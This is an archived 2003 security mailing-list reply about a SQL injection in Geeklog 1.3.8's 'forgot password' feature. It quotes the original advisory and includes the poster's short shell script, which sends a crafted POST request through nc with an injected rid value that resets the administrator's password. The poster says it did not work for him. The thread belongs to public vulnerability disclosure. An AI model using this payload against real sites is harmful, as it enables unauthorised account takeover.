lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BBB8A153.1792%thomas@outcast-media.com>
From: thomas at outcast-media.com (Thomas Rogg)
Subject: Geeklog exploit

am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko@....fi:


> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ